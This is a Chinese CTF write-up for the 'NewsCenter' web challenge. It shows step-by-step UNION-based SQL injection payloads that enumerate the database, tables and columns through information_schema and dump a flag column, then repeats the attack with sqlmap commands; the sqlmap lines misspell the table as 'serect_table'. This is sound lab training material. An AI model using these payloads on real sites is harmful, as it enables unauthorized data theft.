标签:sqlmap web NewsCenter xxx Desktop ctf news table txt
打开环境,功能点只有一个查找新闻,猜测是sql注入
一.手工注入
从最基础的联合查询注入开始
1正常 1'报错 1' '正常
猜测为字符型注入,单引号闭合
1' order by 1,2,3 ;' 正常 1' order by 1,2,3,4 ;'报错
可见一共3列 (;将前后语句分开,'闭合后面的语句,也可以用#注释掉后面的语句)
1' union select 1,2,3;'
页面显示2和3,则2和3为显示位
1' union select 1,database(),3 ;'
查询数据库名,结果为news
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news';'
查询表名,有两个表
1' union select 1, group_concat(column_name), 3 from information_schema.columns where table_name="secret_table" ;'
查询secret_table表里的列名,有两个
1' union select 1, fl4g,3 from secret_table;'
查询fl4g里面的字段,出现flag
二.sqlmap
搜索框中填入内容,如‘1’,回车搜索抓包,将抓到包的内容保存在txt文档里
使用sqlmap的-r进行注入如下,其中C:\Users\xxx\Desktop\1.txt为保存数据包的txt文件绝对路径
#查找数据库
sqlmap.py -r "C:\Users\xxx\Desktop\1.txt" --dbs
#或查找当前数据库
sqlmap.py -r "C:\Users\xxx\Desktop\1.txt" --current-dbs
#查找news数据库中的表
sqlmap.py -r "C:\Users\xxx\Desktop\1.txt" -D news --tables
#查找secret_table表中的列
sqlmap.py -r "C:\Users\xxx\Desktop\1.txt" -D news -T serect_table --columns
#查找fl4g列中的字段(内容),出现flag
sqlmap.py -r "C:\Users\xxx\Desktop\1.txt" -D news -T serect_table -C fl4g --dump
标签:sqlmap,web,NewsCenter,xxx,Desktop,ctf,news,table,txt 来源: https://blog.csdn.net/m0_62619559/article/details/121256876
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。